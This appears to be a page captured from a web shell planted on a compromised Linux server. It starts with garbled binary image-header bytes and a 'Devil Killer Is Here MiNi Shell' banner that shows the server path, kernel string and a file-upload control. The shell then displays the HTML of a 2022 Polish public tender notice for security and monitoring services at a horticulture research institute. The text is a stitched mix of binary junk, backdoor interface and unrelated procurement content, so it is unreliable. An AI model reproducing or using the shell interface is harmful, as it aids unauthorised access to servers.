JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221201/0046944401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> KOMPLEKSOWA USŁUGA OCHRONY FIZYCZNEJ MIENIA ORAZ MONITORINGU OBIEKTÓW INSTYTUTU OGRODNICTWA – PAŃSTWOWEGO INSTYTUTU BADAWCZEGO </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Ogrodnictwa - Państwowy Instytut Badawczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 101023342</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Konstytucji 3 Maja 1/3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skierniewice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">n.wasielewska@pierog.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://inhort.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Instytut badawczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Produkcja ogrodnicza </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">adw. Jerzy Pieróg</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">5251154281</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Nowogrodzka 42/41</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">00-695</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">kancelaria@pierog.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.pierog.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> KOMPLEKSOWA USŁUGA OCHRONY FIZYCZNEJ MIENIA ORAZ MONITORINGU OBIEKTÓW INSTYTUTU OGRODNICTWA – PAŃSTWOWEGO INSTYTUTU BADAWCZEGO </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-325e718f-709d-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00469444</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie jest finansowane z różnych źródeł, w tym ze środków unijnych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pierog.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pierog.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja Zamawiającego z<br/>Wykonawcami odbywa się za pośrednictwem platformy https://pierog.ezamawiajacy.pl - zwanej dalej „Platformą” lub „Systemem”.<br/>Korzystanie z Platformy przez Wykonawców jest bezpłatne. W celu podpisania oferty, oświadczeń i dokumentów Wykonawca musi<br/>pobrać pliki z miejsca „Dokumentacja zamówienia”, podpisać je poza Platformą, a następnie załączyć podpisane pliki do oferty.<br/>Ogólne zasady korzystania z Platformy<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://pierog.ezamawiajacy.pl<br/>lub<br/>2) poprzez stronę https://oneplace.marketplanet.pl<br/>a następnie wybranie opcji „Przystąp do postępowania”.<br/>3) Wykonawca nie posiadający konta zakłada konto wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „Zarejestruj się”.<br/>4) Rejestracja Wykonawcy na Platformie trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w Postępowaniu. Wykonawca wraz z potwierdzeniem<br/>złożenia wniosku rejestracyjnego otrzyma informację o możliwości przyspieszenia procedury założenia konta, wówczas należy<br/>skontaktować się pod numerem telefonu podanym w tym potwierdzeniu.<br/>UWAGA:<br/>Wykonawca może przesłać wniosek o wyjaśnienie treści SWZ korzystając ze „Strefy publicznej” Platformy nie rejestrując konta.<br/>Rejestracja konta jest niezbędna w celu złożenia oferty, oświadczeń i dokumentów w postępowaniu.<br/>Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej<br/>w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Informacje dotyczące odpowiedniego przygotowania stanowiska dostępne są na stronie<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">33/ZP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usług kompleksowej ochrony fizycznej mienia oraz<br/>monitoringu obiektów Instytutu Ogrodnictwa – Państwowego Instytutu Badawczego, realizowanych poprzez:<br/>1) ochronę fizyczną polegającą na stałej obecności pracowników ochrony na posterunkach nr od 1 do 7;<br/>2) monitoring posterunków lub obiektów;<br/>3) działanie grupy interwencyjnej na wezwanie.<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiającemu przysługuje uprawnienie rozszerzenia zakresu zamówienia (prawo opcji) o dodatkowe roboczogodziny<br/>ochrony fizycznej posterunku, którego czas ochrony określony jest odrębnie dla dni roboczych oraz dni wolnych od pracy.<br/>Maksymalna liczba dodatkowych roboczogodzin to 5 100.<br/>Zamawiający, korzystając z uprawnienia wynikającego z prawa opcji, przekaże koordynatorowi ochrony na adres e-mail<br/>wskazany w § 4 ust. 7 umowy informacje o dacie i liczbie godzin realizacji usługi ochrony w dodatkowym zakresie.<br/>Zamawiający prześle Wykonawcy informacje, o których mowa powyżej najpóźniej na 24 godziny przed terminem<br/>rozpoczęcia świadczenia usługi ochrony w ramach prawa opcji.<br/>Skorzystanie z prawa opcji w zakresie zlecenia dodatkowych godzin ochrony fizycznej posterunku jest uprawnieniem<br/>Zamawiającego. W przypadku nieskorzystania z prawa opcji lub skorzystania z prawa opcji w niepełnym zakresie<br/>Wykonawcy nie przysługują żadne roszczenia. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału<br/>w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada uprawnienia do prowadzenia działalności gospodarczej w zakresie<br/>usług ochrony mienia realizowanej w formie bezpośredniej ochrony fizycznej.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału<br/>w postępowaniu dotyczący doświadczenia.<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje należycie co najmniej jedną usługę ochrony<br/>mienia realizowaną w formie bezpośredniej ochrony fizycznej:<br/>1) o wartości brutto co najmniej 500 000,00 zł (słownie złotych pięćset tysięcy 00/100),<br/>2) która została wykonana lub jest wykonywana w sposób ciągły na podstawie umowy zawartej na okres co najmniej 12<br/>miesięcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Przed udzieleniem<br/>zamówienia Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie<br/>krótszym niż 5 dni terminie aktualnych na dzień złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania<br/>wykluczeniu:<br/>oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2021 r. poz. 275), z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Przed<br/>udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni terminie aktualnych na dzień złożenia podmiotowych środków dowodowych na potwierdzenie<br/>spełniania warunków udziału w postępowaniu:<br/>1) wykazu usług, o których mowa w Rozdziale III ust. 2 SWZ, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych<br/>również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz<br/>załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. Wykaz usług stanowi Załącznik<br/>nr 6 do SWZ.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych<br/>od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub<br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w<br/>okresie ostatnich 3 miesięcy.<br/>2) dokumentu potwierdzającego uprawnienie do prowadzenia działalności gospodarczej w zakresie usług ochrony mienia<br/>realizowanej w formie bezpośredniej ochrony fizycznej - koncesji, o której mowa w art. 15 ust. 1 ustawy z dnia 8 listopada 2017 r. o<br/>ochronie osób i mienia (t.j. Dz.U. z 2021 r. poz.1995).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z formularzem oferty Wykonawca zobowiązany jest złożyć:<br/>1) aktualne na dzień składania ofert oświadczenie sporządzone wg wzoru stanowiącego załącznik nr 3 do SWZ stanowiące<br/>potwierdzenie braku podstaw wykluczenia. Oświadczenie należy złożyć pod rygorem nieważności w formie elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>2) dokument, z którego wynika zakres umocowania do działania w imieniu Wykonawcy<br/>w postępowaniu o udzielenie zamówienia:<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>UWAGA: Wykonawca nie jest zobowiązany do złożenia dokumentu, jeżeli dokument Zamawiający może uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów.<br/>b) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa<br/>w lit. a.<br/>UWAGA: Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Zasady określone w lit. b stosuje się odpowiednio do osoby działającej w imieniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>3) oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego musi wynikać, które usługi wykonają poszczególni<br/>Wykonawcy (dotyczy wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie warunku<br/>udziału w postępowaniu wskazanego w rozdziale III ust. 1 i 2) SWZ. Oświadczenie stanowi Załącznik nr 4 do SWZ.<br/>4) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu (jeżeli dotyczy). Wzór zobowiązania stanowi Załącznik nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości 10 000,00 zł (słownie złotych: dziesięć tysięcy 00/100).<br/>2. Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 97 ust. 7 ustawy:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 oraz z 2022 r. poz. 807 i 1079).<br/>3. Wadium wnoszone w formie gwarancji lub poręczenia musi zostać przekazane w oryginale w postaci elektronicznej za<br/>pośrednictwem Platformy zakupowej.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 08 1240 3321 1111<br/>0000 2853 6787 (PEKAO SA I O/Skierniewice).<br/>5. Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy. Za wadium<br/>wniesione w terminie uważa się:<br/>1) dla wadium wnoszonego w pieniądzu – datę i godzinę uznania rachunku bankowego przez bank Zamawiającego przed<br/>upływem terminu składania ofert,<br/>2) dla wadium wnoszonego w formach innych niż pieniądz – data przesłania dokumentu przez Platformę.<br/>6. W przypadku wniesienia wadium w formie gwarancji lub poręczenia koniecznym jest, aby gwarancja lub poręczenie<br/>obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98<br/>ust. 6 ustawy.<br/>7. Wadium wnoszone w formach innych niż pieniądz:<br/>1) musi zawierać stwierdzenie, że gwarant lub poręczyciel zobowiązuje się nieodwołalnie i bezwarunkowo pokryć wszelkie<br/>zobowiązania Wykonawcy wobec Zamawiającego wynikające z zapisów SWZ dotyczące wadium, do wysokości<br/>gwarantowanej kwoty, na pierwsze żądanie Zamawiającego;<br/>2) musi wskazywać informacje pozwalające na identyfikację postępowania, którego dotyczy (np. nazwę i numer<br/>postępowania);<br/>3) nie może wprowadzać żadnych dodatkowych warunków merytorycznych, od spełnienia których zależy spełnienie<br/>świadczeń z tytułu udzielonej gwarancji lub poręczenia.<br/>8. Przedłużenia ważności wadium wniesionego w formie innej niż pieniądz należy dokonywać w formie określonej w ust. 3<br/>oraz w sposób wskazany w ust. 5 pkt 2. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie 